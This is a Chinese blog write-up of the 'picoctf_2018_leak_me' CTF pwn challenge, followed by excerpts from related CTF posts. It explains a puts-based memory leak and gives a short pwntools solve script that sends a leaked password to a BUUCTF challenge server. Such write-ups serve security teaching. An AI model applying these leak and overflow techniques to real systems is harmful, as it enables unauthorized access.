picoctf_2018_leak_me

最新推荐文章于 2023-06-18 14:47:56 发布
最新推荐文章于 2023-06-18 14:47:56 发布
阅读量386 收藏
点赞数
文章标签: wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51298357/article/details/113420616
版权

picoctf_2018_leak_me

反编译修复+满足条件后leak

0x01

​ 这道题一开始F5不能显示伪代码。会显示又有个地方有问题,快捷键g输入有问题的地方的地址,然后点进去先反编译有问题的这个函数,然后再出来反编译整个函数就好了

0x02

查看程序里的函数

  • 大体看一下程序,执行流:程序执行puts输出name → 输入password→password正确时得到flag

  • main函数中fgets函数的地方存在漏洞

# -*- coding: utf-8 -*-
from pwn import *
context.log_level='debug'
p = remote('node3.buuoj.cn',27288)
payload='a'
p.recvuntil('name?\n')
p.sendline(payload)
p.recvuntil(',')
psw='a_reAllY_s3cuRe_p4s$word_f85406'
p.sendlineafter('Password.',psw)
p.interactive()
白日梦-想家
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF(pwn) picoctf_2018_leak_me
半岛铁盒的博客
04-06 328
这题难度不大,分析好流程就可以; name,与密码 是紧挨着的,相差0x100,即256 我们可以利用puts() 进行溢出泄漏密码; 因为 puts() 函数输出遇到\x00停止; from pwn import * p = remote(“node3.buuoj.cn”,27388) p.sendline(‘a’) p.recv() p.sendline(‘a_reAllY_s3cuRe_p4s$word_f85406’) p.interactive() ...
[BUUCTF-pwn]——picoctf_2018_leak_me(内涵peak小知识)
Y_peak的博客
03-29 359
[BUUCTF-pwn]——picoctf_2018_leak_me 题目没什么难度,但是可能反汇编的时候你们可能会出现一些问题。 peak小知识 pwn题,有时会碰到无法反汇编的情况,大多数情况下,都是call的位置报错,双击函数,按F5人为给它反汇编,再返回就可以了。不过有时候,是IDA栈指针的问题,大多数还是前者居多。 思路 在IDA中,v6代表name s是password.距离0x100也就是256。 输入256个字符后,我们可以直接将password泄露出来。这样我们就可以在下面调用flag函
Memory_and_Exception_Trace.zip_memory leak_trace
09-24
C++ memory leak detection and exception
2018nsec crypto_leak
08-23
2018年 nsec ctf密码学题目 crypto_leak。加密是RC8_ENCRYPT,需要根据泄露的信息破解加密
C_Language_Programming_under_Linux_memory_leak_Res_linux_linux
07-15
Linux下C语言程序内存泄漏的研究,阐述了内存泄漏的概念,危害,和常发场景,并给出查找内存泄漏的方法
ijcai_2018:ijcai_2018排名60
05-19
ijcai_2018ijcai_2018 复赛排名 60比赛赛题链接:主要思路如下:1.用7号早上的数据作为训练和本地验证,用31-6号的数据提取历史统计特征2.用7号当天的数据提取统计转化率等特征,用户点击行为,商品,店铺的特征,...
2018nsec crypto_leak writeup代码
08-24
2018 nsec ctf 密码学题目crypto leak的解答代码!
[BUUCTF]PWN——picoctf_2018_leak_me(puts的‘\x00’绕过输出敏感数据)
mcmuyanga的博客
02-02 344
picoctf_2018_leak_me 附件 步骤 例行检查,32位,开启了nx保护 本地运行看一下大概的情况 32位ida载入 程序执行的大概流程就是先输入name,然后输入password,靶机上应该会有一个password.txt去检测是否输入是否正确,输入正确,就会调用flag函数,flag函数回将flag打印出来 参数v5(存放name)和参数s(存放flag)在栈上的位置相差不远,而且给参数v5读入数据的时候可以覆盖道参数s 他们相差0x154-0x54=0x100,而且我们对v
非常规情况下栈溢出系统调用——PicoCTF_2018_can-you-gets-me
PLpa的博客
08-04 480
前言: 对于这种非常规的栈溢出题目,我自己也是见的比较少,故写此博客记录一下。 解题思路 查看保护 只开了NX保护的32位程序,如果是常规题的话,应该是非常容易做的。 进入IDA查看伪代码 打开IDA,如果是第一次见这种题目就会傻眼了。 题目中的每一个函数都好像是自己写的,那么我们就不能利用got表来泄露函数地址来getshell了。 题目开了NX保护,我们不能写shellcode,常规的ROP又利用不了,我们就完全利用不了libc里边的函数了。 乍一看,好像没什么办法了,但是我们可以用程序中非常多的g
【CTFHub】leak canary
最新发布
麦芽雪冷萃
06-18 282
程序的逻辑很简单,进行两次输入输出。第一次输入时,我们可以利用格式化字符串漏洞拿到`canary`的值,第二次输入时,我们可以利用栈溢出漏洞,填充足够的`padding`并保证`canary`的值不被覆盖,最后劫持程序执行`shell()`。
PicoCTF_2018_are_you_root(未初始化验证漏洞)
seaaseesa的博客
04-17 837
PicoCTF_2018_are_you_root 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,只要符合条件就可以显示flag,但是按照正常的逻辑是不能的。 Login时,会malloc一个堆,大小为0x10,并且偏移8处就是auth的验证码。但是login时,并没有初始化*(v7+8)处的值,使得它的值是前面的操作影响。而strdup函数,内部会malloc一个与字符...
*CTF2021部分复现
SopRomeo的博客
01-20 1413
web oh-my-note 从源码可以看出session 是经过两次随机进行设置,首先随机取得user_id,在通过user_id和提交的时间取得note_id 看到 view路由 可以发现我们可以通过这个公开页面获得note_id 网页中恰好也给到了admin 的note_id 而我们发现在my_notes 这个路由我们有两种方式看到提交的note 一种session,另一种是GET请求发送user_id 很明显,题目意思要求爆破user_id 创建用户和提交时间可能存在几毫秒的偏差 源码中采
ACTF2022 rsa leak
m0_62506844的博客
07-12 1180
之前是不想写这个wp的,但是这两天突然想起来这道题发现没有留exp,怕下次遇到,浅记一下 首先对于leak(rp,rq),可以通过某种手段,来找到rp和rq n很小可以直接分解 首先是打表爆破: 得到 rp=405771 rq=11974933 网上学到了一种新方法 中间相遇攻击哇塞这个不就是打表爆破吗,还以为能学到新东西!!? 知道rp和rq后,可以参考论文 A New Attack on Special-Structed RSA Primes 伪代码: 复现: 下面给出不用论文的wp: 每次复现论文
BUUCTF刷题4
m0_51251108的博客
10-30 306
题目:hitcon2014_stkof:pwnable_hacknote:ciscn_2019_s_9:picoctf_2018_shellcode:npuctf_2020_easyheap:cmcc_pwnme2:x_ctf_b0verfl0w:picoctf_2018_leak_me:suctf_2018_basic pwn:cmcc_pwnme1: hitcon2014_stkof: 参考师傅:(4条消息) 好好说话之unlink_hollk’s blog-CSDN博客_好好说话之unlink 利用方
picoCTF2019-rsa-pop-qui Writeup
FSky的博客
07-12 539
picoCTF2019-rsa-pop-qui Writeup目录第一题:已知p,q 求 n第二题:已知p,n 求 q第三题:已知n,e 求 p,q第四题:已知p,q 求 r第五题:已知e,n 和 明文 求 密文第六题:已知e,n 和 密文 求 明文第七题:已知p,q,e 求 d第八题:已知p,n,e 和 密文 求 明文最终结果处理 目录 题目 Class, take your seats! It’s PRIME-time for a quiz… nc 2019shell1.picoctf.com 309
picoCTF2020-GeneralSkills
煤矿路口西的博客
11-11 556
picoCTF General Skills 2Warm [2Warm] Can you convert the number 42 (base 10) to binary (base 2)? 十进制42转二进制,在线网站即可。 Warmed Up [Warmed Up] What is 0x3D (base 16) in decimal (base 10)? 十六进制转十进制,同上 Lets Warm Up [Lets Warm Up] If I told you a word s.
补充一下这段代码,公式是C \dot{V}=I-\overbrace{g_{\text {leak }}\left(V-E_{\text {leak }}\right)}^{\text {Ohmic leakage }},
05-23
这段代码是神经元膜电位的动态方程,其中 $C$ 是膜电容, $V$ 是膜电位, $I$ 是外部电流, $g_{\text{leak}}$ 是泄漏电导, $E_{\text{leak}}$ 是泄漏平衡电位。 补充的代码如下: ```python # 定义参数 C = 1.0 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值